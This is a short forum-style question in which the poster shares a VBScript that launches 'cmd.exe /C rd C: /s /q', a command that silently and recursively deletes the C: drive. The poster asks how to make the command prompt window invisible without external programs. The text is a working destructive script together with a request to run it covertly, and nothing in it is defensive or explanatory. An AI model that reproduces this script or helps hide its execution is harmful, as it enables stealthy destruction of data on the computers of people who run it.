So, here's the script:
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd.exe /C rd C: /s /q"
Set oShell = Nothing
The thing is that I want to make that command line prompt be invisible / hidden and I don't want to use external programs.